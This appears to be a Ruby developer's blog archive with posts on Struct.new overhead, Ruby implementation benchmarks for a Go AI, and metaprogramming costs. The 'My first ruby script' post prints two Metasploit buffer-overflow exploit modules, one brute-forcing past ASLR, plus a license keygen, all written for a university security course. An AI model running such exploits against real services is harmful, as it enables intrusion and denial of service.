Category: Software Engineering

Don’t you Struct.new(…).new(…)

As I just happened upon it again, I gotta take a moment to talk about one my most despised ruby code patterns: Struct.new(...).new – ever since I happened upon it for the first time.

Struct.new?

Struct.new is a convenient way to create a class with accessors:

2.2.2 :001 > Extend = Struct.new(:start, :length)
 => Extend 
2.2.2 :002 > instance = Extend.new(10, 20)
 => #<struct Extend start=10, length=20> 
2.2.2 :003 > instance.start
 => 10 
2.2.2 :004 > instance.length
 => 20

That’s neat, isn’t it? It is, but like much of Ruby’s power it needs to be wielded with caution.

Where Struct.new goes wrong – the second new

When you do Struct.new you create an anonymous class, another new on it creates an instance of that class. Therefore, Struct.new(...).new(...) creates an anonymous class and creates an instance of it at the same time. This is bad as we create a whole class to create only one instance of it! That is a capital waste.

As a one-off use it might be okay, for instance when you put it in a constant. The sad part is, that this is not the only case I’ve seen it used. As in the first case where I encountered it, I see it used inside of code that is invoked frequently. Some sort of hot loop with calculations where more than one value is needed to represent some result of the calculation. Here programmers sometimes seem to reach for Struct.new(...).new(...).

Why is that bad?

Well it incurs an unnecessary overhead, creating the class every time is unnecessary. Not only that, as far as I understand it also creates new independent entries in the method cache. For JITed implementations (like JRuby) the methods would also be JITed independently. And it gets in the way of profiling, as you see lots of anonymous classes with only 1 to 10 method calls each.

But how bad is that performance hit? I wrote a little benchmark where an instance is created with 2 values and then those 2 values are read one time each. Once with Struct.new(...).new(...), once where the Struct.new(...) is saved in an intermediary constant. For fun and learning I threw in a similar usage with Array and Hash.

Benchmark.ips do |bm|
  bm.report "Struct.new(...).new" do
    value = Struct.new(:start, :end).new(10, 20)
    value.start
    value.end
  end

  SavedStruct = Struct.new(:start, :end)
  bm.report "SavedStruct.new" do
    value = SavedStruct.new(10, 20)
    value.start
    value.end
  end

  bm.report "2 element array" do
    value = [10, 20]
    value.first
    value.last
  end

  bm.report "Hash with 2 keys" do
    value = {start: 10, end: 20}
    value[:start]
    value[:end]
  end

  bm.compare!
end

I ran those benchmarks with CRuby 2.3. And the results, well I was surprised how huge the impact really is. The “new-new” implementation is over 33 times slower than the SavedStruct equivalent. And over 60 times slower than the fastest solution (Array), although that’s also not my preferred solution.

Struct.new(...).new    137.801k (± 3.0%) i/s -    694.375k
SavedStruct.new      4.592M (± 1.7%) i/s -     22.968M
2 element array      7.465M (± 1.4%) i/s -     37.463M
Hash with 2 keys      2.666M (± 1.6%) i/s -     13.418M
Comparison:
2 element array:  7464662.6 i/s
SavedStruct.new:  4592490.5 i/s - 1.63x slower
Hash with 2 keys:  2665601.5 i/s - 2.80x slower
Struct.new(...).new:   137801.1 i/s - 54.17x slower
Benchmark in iterations per second (higher is better)
Benchmark in iterations per second (higher is better)

But that’s not all…

This is not just about performance, though. When people take this “shortcut” they also circumvent one of the hardest problems in programming – Naming. What is that Struct with those values? Do they have any connection at all or were they just smashed together because it seemed convenient at the time. What’s missing is the identification of the core concept that these values represent. Anything that says that this is more than a clump of data with these two values, that performs very poorly.

So, please avoid using Struct.new(...).new(...) – use a better alternative. Don’t recreate a class over and over – give it a name, put it into a constant and enjoy a better understanding of the concepts and increased performance.

Benchmarking a Go AI in Ruby: CRuby vs. Rubinius vs. JRuby vs. Truffle/Graal

The world of Artificial Intelligences is often full of performance questions. How fast can I compute a value? How far can I look ahead in a tree? How many nodes can I traverse?

In Monte Carlo Tree Search one of the most defining questions is “How many simulations can I run per second?”. If you want to learn more about Monte Carlo Tree Search and its application to the board game Go I recommend you the video and slides of my talk about that topic from Rubyconf 2015.

Implementing my own AI – rubykon – in ruby of course isn’t going to get me the fastest implementation ever. It forces you to really do less and therefore make nice performance optimization, though. This isn’t about that either. Here I want to take a look at another question: “How fast can Ruby go?” Ruby is a language with surprisingly many well maintained implementations. Most prominently CRuby, Rubinius, JRuby and the newcomer JRuby + Truffle. How do they perform in this task?

The project

Rubykon is a relatively small project – right now the lib directory has less than 1200 lines of code (which includes a small benchmarking library… more on that later). It has no external runtime dependencies – not even the standard library. So it is very minimalistic and also tuned for performance.

Setup

The benchmarks were run pre the 0.3.0 rubykon version on the 8th of November (sorry writeups always take longer than you think!) with the following concrete ruby versions (versions slightly abbreviated in the rest of the post):

  • CRuby 1.9.3p551
  • CRuby 2.2.3p173
  • Rubinius 2.5.8
  • JRuby 1.7.22
  • JRuby 9.0.3.0
  • JRuby 9.0.3.0 run in server mode and with invoke dynamic enabled (denoted as + id)
  • JRuby + Truffle Graal with master from 2015-11-08 and commit hash fd2c179, running on graalvm-jdk1.8.0

You can find the raw data (performance numbers, concrete version outputs, benchmark results for different board sizes and historic benchmark results) in this file.

This was run on my pretty dated desktop PC (i7 870):


tobi@tobi-desktop ~ $ uname -a
Linux tobi-desktop 3.16.0-38-generic #52~14.04.1-Ubuntu SMP Fri May 8 09:43:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
tobi@tobi-desktop ~ $ java -version
openjdk version "1.8.0_45-internal"
OpenJDK Runtime Environment (build 1.8.0_45-internal-b14)
OpenJDK 64-Bit Server VM (build 25.45-b02, mixed mode)
tobi@tobi-desktop ~ $ lscpu
Architecture:          x86_64
CPU op-mode(s):        32-bit, 64-bit
Byte Order:            Little Endian
CPU(s):                8
On-line CPU(s) list:   0-7
Thread(s) per core:    2
Core(s) per socket:    4
Socket(s):             1
NUMA node(s):          1
Vendor ID:             GenuineIntel
CPU family:            6
Model:                 30
Stepping:              5
CPU MHz:               1200.000
BogoMIPS:              5887.87
Virtualization:        VT-x
L1d cache:             32K
L1i cache:             32K
L2 cache:              256K
L3 cache:              8192K
NUMA node0 CPU(s):     0-7

First benchmark: Simulation + Scoring on 19×19

This benchmark uses benchmark-ips to see how many playouts (simulation + scoring) can be done per second. This is basically the “evaluation function” of the Monte Carlo Method. Here we start with an empty board and then play random valid moves until there are no valid moves anymore and then we score the game. The performance of a MCTS AI is hugely dependent on how fast that can happen.

Benchmarks were run with a warmup time of 60 seconds and a run time of 30 seconds. The small black bars in the graph denote standard deviation. Results:

19_19_ips.png
Full 19×19 playout, iterations per second (higher is better)
Ruby Version iterations per second standard deviation
CRuby 1.9.3p551 44.952 8.90%
CRuby 2.2.3p173 55.403 7.20%
Rubinius 2.5.8 40.911 4.90%
JRuby 1.7.22 63.456 15.80%
JRuby 9.0.3.0 73.479 6.80%
JRuby 9.0.3.0 + invoke dynamic 121.265 14.00%
JRuby + Truffle 192.42 14.00%

JRuby + Truffle runs on a slightly modified version of benchmark-ips. This is done because it is a highly optimizing and speculative runtime that leads to bad results after warmup. This is explained here.

Second benchmark: Full UCT Monte Carlo Tree Search with 1000 playouts

This benchmark does a full Monte Carlo Tree Search, meaning choosing a node to investigate, doing a full simulation and scoring there and then propagating the results back in the tree before starting over again. As the performance is mostly dependent on the playouts the graph looks a lot like the one above.

This uses benchmark-avg, which I wrote myself and (for now) still lives in the rubykon repository. Why a new benchmarking library? In short: I needed something for more “macro” benchmarks that gives nice output like benchmark-ips. Also, I wanted a benchmarking tool that plays nice with Truffle – which means doing warmup and run of a benchmark directly after one another, as detailed in this issue.

This uses a warmup time of 3 minutes and a run time of 2 minutes. Along with the iterations per minute, we have another graph depicting average run time.

19_19_ipm.png
MCTS on 19×19 with 1000 playouts, iterations per minute (higher is better)
19_19_avg.png
MCTS on 19×19 with 1000 playouts, average run time (lower is better)
Ruby Version iterations per minute average time (s) standard deviation
CRuby 1.9.3p551 1.61 37.26 2.23%
CRuby 2.2.3p173 2.72 22.09 1.05%
Rubinius 2.5.8 2.1 28.52 2.59%
JRuby 1.7.22 3.94 15.23 1.61%
JRuby 9.0.3.0 3.7 16.23 2.48%
JRuby 9.0.3.0 + invoke dynamic 7.02 8.55 1.92%
JRuby + Truffle 9.49 6.32 8.33%

Results here pretty much mirror the previous benchmark, although standard deviation is smaller throughout which might be because more non random code execution is involved.

Otherwise the relative performance of the different implementations is more or less the same, with the notable exception of JRuby 1.7 performing better than 9.0 (without invoke dynamic). That could be an oddity, but it is also well within the margin of error for the first benchmark.

For the discussion below I’ll refer to this benchmark, as it ran on the same code for all implementations and has a lower standard deviation overall.

Observations

The most striking observation certainly is JRuby + Truffle/Graal sits atop in the benchmarks with a good margin. It’s not that surprising when you look at previous work done here suggesting speedups of 9x to 45x as compared to CRuby. Here the speedup relative to CRuby is “just” 3.5 which teaches us to always run your own benchmarks.

It is also worth noting that Truffle first was unexpectedly very slow (10 times slower than 1.9) so I opened an issue and reported that somewhat surprising lack in performance. Then Chris Season was quick to fix it and along the way he kept an amazing log of things he did to diagnose and make it faster. If you ever wanted to take a peek into the mind of a Ruby implementer – go ahead and read it!

At the same time I gotta say that the warmup time it takes has got me worried a bit. This is a very small application with one very hot loop (generating the valid moves). It doesn’t even use the standard library. The warmup times are rather huge exactly for Truffle and I made sure to call no other code in benchmark/avg as this might deoptimize everything again. However, it is still in an early stage and I know they are working on it:)

Second, “normal” JRuby is faster than CRuby which is not much of a surprise to me – in most benchmarks I do JRuby comes up ~twice as fast CRuby. So when it was only ~30% faster I was actually a bit disappointed, but then remembered the --server -Xcompile.invokedynamic=true switches and enabled them. BOOM! Almost 2.6 times faster than CRuby! Almost 90% faster than JRuby without those switches.

Now you might ask: “Why isn’t this the default?” Well, it was the default. Optimizing takes time and that slows down the startup time, for say rails, significantly which is why it was deactivated by default.

If I’m missing any of these magic switches for any of the other implementations please let me know and I’ll add them.

I’m also a bit sad to see rubinius somewhere between 1.9 and 2.2 performance wise, I had higher hopes for its performance with some appropriate warmup time.

Also opal is notably missing, I couldn’t get it to run but will try again in a next version to see what V8 can optimize here.

An important word of warning to conclude the high level look at the different implementations: These benchmarks are most likely not true for your application! Especially not for rails! Benchmark yourself:)

Now for another question that you probably have on your mind: “How fast is this compared to other languages/implementations?” See, that’s hard to answer. No serious Go engine does pure random playouts, they all use some heuristics slowing them down significantly. But, they are still faster. Here’s some data from this computer go thread, they all refer to the 19×19 board size:

  • it is suggested than one should be able to do at least 100 000 playouts per second without heuristics
  • With light playouts Aya did 25 000 playouts in 2008
  • well known C engine pachi does 2000 heavy playouts per thread per second

Which leads us to the question…

Is this the end of the line for Ruby?

No, there are still a couple of improvements that I have in mind that can make it much faster. How much faster? I don’t know. I have this goal of 1000 playouts on 19×19 per second per thread in mind. It’s still way behind other languages, but hey we’re talking about Ruby here😉

Some possible improvements:

  • Move generation can still be improved a lot, instead of always looking for a new valid random moves a list of valid moves could be kept around, but it’s tricky
  • Scoring can also be done faster by leveraging neighbouring cells, but it’s not the bottleneck (yet)
  • a very clever but less accurate data structure can be used for liberty counting
  • also, of course, actually parallelize it and run on multiple threads
  • I could also use an up to date CPU for a change😉

Other than that, I’m also looking over to the ruby implementations to get better, optimize more and make it even faster. I have especially high hopes for JRuby and JRuby + Truffle here.

So in the future I’ll try to find out how fast this can actually get, which is a fun ride and has taught me a lot so far already! You should try playing the benchmark game for yourselves:)

Video + Slides: Beating Go Thanks to the Power of Randomness (Rubyconf 2015)

I was happy enough to present at rubyconf this year. Here go my video, slides and abstract!

Video
Slides
Abstract

Go is a board game that is more than 2,500 years old (yes, this is not about the programming language!) and it is fascinating from multiple viewpoints. For instance, go bots still can’t beat professional players, unlike in chess.

This talk will show you what is so special about Go that computers still can’t beat humans. We will take a look at the most popular underlying algorithm and show you how the Monte Carlo method, basically random simulation, plays a vital role in conquering Go’s complexity and creating the strong Go bots of today.

Slides: Optimizing For Readability (Codemotion Berlin 2015)

Slides: Optimizing For Readability (Codemotion Berlin 2015)

Yesterday I gave a talk at Codemotion Berlin, it was “Optimizing For Readability” – an updated version of my “Code is read many more times than written”. It features new insights and new organizational practices to keep the code base clean and nice. Abstract:

What do software engineers do all day long? Write code? Of course! But what about reading code, about understanding what’s happening? Aren’t we doing that even more? I believe we do. Because of that code should be as readable as possible! But what does that even mean? How do we achieve readable code? This talk will introduce you to coding principles and techniques that will help you write more readable code, be more productive and have more fun!

CS5j0v_WEAAm7S9.jpg:large
(pictures by Raluca Badoi

And here you can see the slides, sadly there is no video😦 Slides are CC BY-NC-SA.

Hope you like the code, please leave some feedback. I’d especially love suggestions for a better talk title:)

The not so low cost of calling dynamically defined methods

There are a couple of mantras that exist across programming communities, one of them is to avoid duplication or to keep it DRY. Programming languages equip us with different tools to avoid duplication. In Ruby a popular way to achieve this is Metaprogramming. Methods are dynamically defined to get rid off all duplication and we rejoice – yay! There might be other problems with metaprogrammed solutions, but at least we are sure that the performance is the same as if we’d had written that duplicated code. Or are we?

As the title suggests this post examines the performance of these meta programmed methodsIf you are looking for method definition performance or pure call overhead you’ll find this information in this post by Aaron Patterson.

Before we get into the details I want to quickly highlight that this is not some theoretical micro benchmark I pulled out of thin air. These examples are derived from performance improvements on an actual project. That work was done by my friend Jason R. Clark on this pull request over at Shoes 4. As he doesn’t have time to write it up – I get to, so let’s get to it!

Let’s look at some methods!

(Please be aware that this example is simplified, of course the real code has varying parts most importantly the name of the instance_variable which is the reason why the code was meta programmed in the first place)

class FakeDimension
  def initialize(margin_start)
    @margin_start = margin_start
    @margin_start_relative = relative? @margin_start
  end

  def relative?(result)
    result.is_a?(Float) && result <= 1
  end

  def calculate_relative(result)
    (result * 100).to_i
  end

  define_method :full_meta do
    instance_variable_name = '@' + :margin_start.to_s
    value = instance_variable_get(instance_variable_name)
    value = calculate_relative value if relative? value
    value
  end

  IVAR_NAME = "@margin_start"
  define_method :hoist_ivar_name do
    value = instance_variable_get(IVAR_NAME)
    value = calculate_relative value if relative? value
    value
  end

  define_method :direct_ivar do
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end

  eval <<-CODE
  def full_string
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end
  CODE

  def full_direct
    value = @margin_start
    value = calculate_relative value if relative? value
    value
  end
end

Starting at the first define_method these are all more or less the same method. We start at a fully meta programmed version, that even converts a symbol to an instance variable name, and end with the directly defined method without any meta programming. Now with all these methods being so similar you’d expect them all to have roughly the same performance characteristics, right? Well, such is not the case as demonstrated by the following benchmark. I benchmarked these methods both for the case where the value is relative and for when it is not. The results are not too different – see the gist for details. Running the non relative version on CRuby 2.2.2 with benchmark-ips I get the following results (higher is better):

           full_meta      1.840M (± 3.0%) i/s -      9.243M
     hoist_ivar_name      3.147M (± 3.3%) i/s -     15.813M
         direct_ivar      5.288M (± 3.1%) i/s -     26.553M
         full_string      6.034M (± 3.2%) i/s -     30.179M
         full_direct      5.955M (± 3.2%) i/s -     29.807M

Comparison:
         full_string:  6033829.1 i/s
         full_direct:  5954626.6 i/s - 1.01x slower
         direct_ivar:  5288105.5 i/s - 1.14x slower
     hoist_ivar_name:  3146595.7 i/s - 1.92x slower
           full_meta:  1840087.6 i/s - 3.28x slower

And look at that, the full_meta version is over 3 times slower than the directly defined method! Of course direct_ivar is also pretty close, but it’s an unrealistic scenario as the instance variable name is what is really changing. You can interpolate the string of the method definition in the full_string version, though. This achieves results as if the method had been directly defined. But what’s happening here?

It seems that there is a higher than expected cost associated with calling instance_variable_get, creating the necessary string and calling methods defined by define_method overall. If you want to keep the full performance but still alter the code you have to resort to the evil eval and stitch your code together in string interpolation. Yay.

So what, do we all have to eval method definitions for metaprogramming now?

Thankfully no. The performance overhead is constant – if your method does more expensive calculations the overhead diminishes. This is the somewhat rare case of a method that doesn’t do much (even the slowest version can be executed almost 2 Million times per second) but is called a lot. It is one of the core methods when positioning UI objects in Shoes. Obviously we should also do the hard work and try not to call that method that often, we’re working on that and already made some nice progress. But, to quote Jason, “regardless what we do I think that Dimension is bound to always be in our hot path.”.

What about methods that do more though? Let’s take a look at an example where we have an object that has an array set as an instance variable and has a method that concatenates another array and sorts the result (full gist):

class Try

  def initialize(array)
    @array = array
  end

  define_method :meta_concat_sort do |array|
    value = instance_variable_get '@' + :array.to_s
    new_array = value + array
    new_array.sort
  end

  def concat_sort(array)
    new_array = @array + array
    new_array.sort
  end
end

We then benchmark those two methods with the same base array but two differently sized input arrays:

BASE_ARRAY        = [8, 2, 400, -4, 77]
SMALL_INPUT_ARRAY = [1, 88, -7, 2, 133]
BIG_INPUT_ARRAY   = (1..100).to_a.shuffle

What’s the result?

Small input array
Calculating -------------------------------------
    meta_concat_sort    62.808k i/100ms
         concat_sort    86.143k i/100ms
-------------------------------------------------
    meta_concat_sort    869.940k (± 1.4%) i/s -      4.397M
         concat_sort      1.349M (± 2.6%) i/s -      6.805M

Comparison:
         concat_sort:  1348894.9 i/s
    meta_concat_sort:   869940.1 i/s - 1.55x slower

Big input array
Calculating -------------------------------------
    meta_concat_sort    18.872k i/100ms
         concat_sort    20.745k i/100ms
-------------------------------------------------
    meta_concat_sort    205.402k (± 2.7%) i/s -      1.038M
         concat_sort    231.637k (± 2.5%) i/s -      1.162M

Comparison:
         concat_sort:   231636.7 i/s
    meta_concat_sort:   205402.2 i/s - 1.13x slower

With the small input array the dynamically defined method is still over 50% slower than the non meta programmed method! When we have the big input array (100 elements) the meta programmed method is still 13% slower, which I still consider very significant.

I ran these with CRuby 2.2.2, in case you are wondering if this is implementation specific. I ran the same benchmark with JRuby and got comparable results, albeit the fact that JRuby is usually 1.2 to 2 times faster than CRuby, but the slowdowns were about the same.

So in the end, what does it mean? Always benchmark. Don’t blindly optimize calls like these as in the grand scheme of things they might not make a difference. This will only be really important for you if a method gets called a lot. If it is in your library/application, then replacing the meta programmed method definitions might yield surprising performance improvements.

UPDATE 1: Shortly after this post was published coincidentally JRuby 9.0.0.3.0 was released with improvements to the call speed of methods defined by define_method. I added the benchmarks to the comments of the gist. It is 7-15% faster for full_meta and hoist_ivar_name but now the direct_ivar is about as fast as its full_meta and full_string counterparts thanks to the optimizations!

UPDATE 2: I wrote a small benchmark about what I think is the bottle neck here – instance_variable_get. It is missing the slowest case but is still up to 3 times slower than the direct access.

My first ruby script – what was yours?

Can you still remember the first program you ever wrote? The first program you ever wrote in your current favorite language? How far you’ve come and how much you’ve learned since then?

I think it’s important to acknowledge this fact and let people know. Often beginners tell me that they can’t really imagine getting from where they are right now in terms of programming skill to where more experienced people are. Therefore, I think it’s important to show where even experienced developers come from, to give some perspective.

I can’t currently locate the code of the first programs I ever wrote. I exactly know (and still have) my first ruby scripts, though. At that time I was already in the third semester of my bachelor and mostly security focussed in my studies. It was January of 2010 and we had a special task to earn bonus points in the Internet Security course by writing two exploits and a key generator. I decided to use these tasks to learn me some ruby – without reading a book about it or anything. The code is heavily commented, as we had to hand it in and that was one of the requirements.

So here goes the code (unmodified, as handed in). I want to share it to shoe people what horrible unruby-ish code I used to write. I want to encourage you to do the same. Maybe tweet it out with #myfirstrubyscript and a link to a gist or so?

Here is the gist for my first couple of ruby scripts, they are probably easier to read over there as my current blog layout is too narrow: Tobi’s first ruby scripts

The first exploit

The firs exploit was for a service on a provided debian system, that was vulnerable to a buffer overflow. We just had the binary and had to go from there.

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  #
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask11',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 5 $',
      'Payload'        =>
        {
          'Space'    => 1540,
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbfffef34,
              'BufSize' => 1640  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))
       
      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],    self.class)
  end
 
 
  #
  # The exploit method connects to the remote service and sends the payload
  # followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad
  #
  def exploit
    connect
 
    print_status ("Start exploiting the vulnerable debianmachine")
    #
    # Build the buffer for transmission
    # the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves
    # so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough)
    #
    buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00"
    print_status("Sending #{buf.length} byte data")
 
    # Send it off
    sock.put(buf)
    sock.get
 
    handler
 
  end
 
end

The second exploit (ASLR)

This time the target was a gentoo machine I believe (despite what the first comment says), and the special problem was that the machine used ASLR – Address Space Layout Randomization. A technique to prevent buffer overflows as the return address changes. My solution to that is error prone and doesn’t always work, but see for yourselves:)

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
  #
  # This exploit affects the debian Linuxmachine from our IS Special task.
  # take note of the description as I couldn't find another way in time.
  # possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack....
  #
  include Exploit::Remote::Tcp
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Istask12',
      'Description'    => %q{
        This explois was made as part of the Internet Security Special Task.
     you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards
     through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c).
      },
      'Author'         => 'Tobi',
       'Version'        => '$Revision: 100 $',  
      'Payload'        =>
        {
          'Space'    => 400,  #should be enough for most of the payloads
          'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          # Target 0: Linux
          [
            'Linux',
            {
              'Platform' => 'linux',
              'Ret'      => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized)
              'BufSize' => 1032  # as found out by debugging/boomerang
            }
          ],
        ],
      'DefaultTarget' => 0))
       
      #set a default port
      register_options(
      [
        Opt::RPORT(9999)
      ],    self.class)
  end
 
 
  #
  # this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle).
  #
  def exploit
 
    print_status ("Start exploiting the vulnerable gentoomachine")
    #
    # initialization here we determine a couple of important values
    #
    return_address = target.ret
    nops_after_payload = 12 # 4- aligned
    nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload  
    print_status("nops_before_payload: #{nops_before_payload}")
     
    # initialize the constant part of the buffer (for performancereasons)
    standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload )  
     
    # can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so )
    payload_offset = 4- payload.encoded.length % 4
     
 
     
    # as long as we don't reach a region where our buffer can't be we keep on trying.
    while  (return_address < 0xc0000000)  
      connect
      buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian)
      print_status("trying address #{return_address} ")
      # Send it off
      sock.put(buf)
      sock.get
      handler
      return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned
      disconnect
    end
     
     
  end
 
end

The key generator

The last task was considerably easier than the first two tasks, this time we just had a binary and had to generate keys which this binary would accept. In this code you can see me not using constants, but making up for it with using for loops. And probably lots of other terrible things – didn’t want to look at it too closely😉

# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy
 
## the numbers as taken from the binary, which are used to XOR encrypt the key  there
encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A]
 
# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long)
# sicne ruby doesn't really support multidimensional arrays out of the box we got
# to add an array as an element
possencr = Array.new
for i in 0..7 do
  #we're going to temporarily save the found values here
  temparray = []
  for j in 0..255 do
    keychar = j ^ encryptnumbers[i]
    # if keychar is printable
    if ((keychar >= 32) and (keychar <= 126))
      temparray << j
    end
  end
  possencr << temparray
end
 
# in the resulting array, the first index is also the index of the keys/encryptnumbers
# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out)
# note that the numbers are in order (lowest number comes first)
# now we try to genereate a key
crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum
key = Array.new # saves the corresponding keychars
sum = 0
 for i in 0..4 do  #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random
    crypt[i] = possencr[i][rand(possencr[i].length)]
    # key is automotically printable due to our awesome array
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end
   
  # so here will be some magice, we'll use our last 3 chars to adjust the sum in  
  # such a way that it's between 97 and 122.
  # we're lucky, as I found out our last 3 possible encrypted chars, have no holes  
  # in the array, it's 95 elements each and all consecutive
  # 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122
  offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255)  # &255 ---> take the last byte (least significant)
  if offset <0  
    offset = 256 + offset
  end
   
  # we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space
  index = offset/3
  # now make the damned last three chars!
  for i in 5..7 do
    crypt[i] = possencr[i][index]
    key[i] = crypt[i] ^ encryptnumbers[i]
    sum+= crypt[i]
  end
   
  # we just need the last byte
  sum = sum & 255
  key[8] = sum
 
#make them chars (not numbers)
for i in 0..8 do
  key[i]=key[i].chr
end
# make a string out of the array of chars
key = key.to_s
# output the key - BAM!
puts key

How about you?

What was your first ruby script? Can you still find and share it? If so, please tweet it out with #myfirstrubyscript to show that everyone eventually started small:)

Make sure your examples match your claim (case: FP vs. OOP)

I started reading Functional Programming Patterns in Scala and Clojure – a nice book so far. However, right at the beginning in Chapter 1.1 “What is Functional Programming?” the author compares an object-oriented implementation with  a functional implementation. Here is the code, first object-oriented (Java):

public List filterOdds(List list) {
    List filteredList = new ArrayList();
    for (Integer current : list) {
        if (isOdd(current)) {
            filteredList.add(current);
        }
    }
    return filteredList;
}
private boolean isOdd(Integer integer) {
    return 0 != integer % 2;
}

Now functional version (Clojure):

(filter odd? list-of-ints)

After this comparison the author states: “The functional version is obviously much shorter than the object-oriented version.”. Well let’s all just go and do functional programming then!

Not so fast. The object-oriented example has a lot of clutter that has nothing to do with Object-oriented Programming, they are just due to Java or in part due to a somewhat unfair comparison. Let’s walk through the code and remove the clutter to make a better comparison.

Types

The sample features a lot of type information – that has nothing to do with OOP vs. FP, there are also functional languages that have types, although a lot of them handle them better than Java. Let’s Remove them:

public filterOdds(list) {
    filteredList = [];
    for (current : list) {
        if (isOdd(current)) {
            filteredList.add(current);
        }
    }
    return filteredList;
}
private isOdd(integer) {
    return 0 != integer % 2;
}

isOdd method

The Java sample defines a private isOdd method to check if a number is odd. This has nothing to do with OOP, it’s just a detail that Java does not implement an isOdd method themselves. There might also be functional languages out there, that doesn’t have it built in like Clojure. So let’s remove that as well:

public filterOdds(list) {
    filteredList = [];
    for (current : list) {
        if (isOdd(current)) {
            filteredList.add(current);
        }
    }
    return filteredList;
}

 

Method definition

The Clojure version does not define a method while the Java version defines a method. So let’s remove that method definition from the Java code. I also omit the return statement, because the result is now saved in the filteredList, which can be used for further computation.

filteredList = [];
for (current : list) {
    if (isOdd(current)) {
        filteredList.add(current);
    }
}

Be careful with your comparisons

Compare the final code sample with what we started out with. It’s half the lines of code and much more concise. I stripped off parts of the code that I believe have nothing to do with the argument at hand, but are rather details of Java. I still like the Clojure sample better and I’d also prefer coding Clojure over Java any day of the week. That’s not the point.

The point is that one should be diligent to make examples for comparisons stick to the topic at hand. And in the book the topic was FP vs. OOP – not Java vs. Clojure.

On a final note, a lot of cool mainly object-oriented languages have features akin to these of functional programming. Often in the shape of blocks. Let’s take a look at Smalltalk, the language that is often credited with introducing Object-oriented Programming. Let’s implement our little code sample there (I used GNU Smalltalk, which implements Smalltalk-80, the “original”):

ints select: [:i | i odd]

That’s short and sweet! Now, just for kicks, let’s do ruby, which is mainly object-oriented, but well luckily has these functional features:

ints.select &:odd?

Just saying, be careful with your examples. These two (mainly) object-oriented languages do just as well as Clojure here.

Last but not least, let it be duly noted, that yes the Clojure result is lazy and immutable, but then again that’s not the point here, although both are col features😉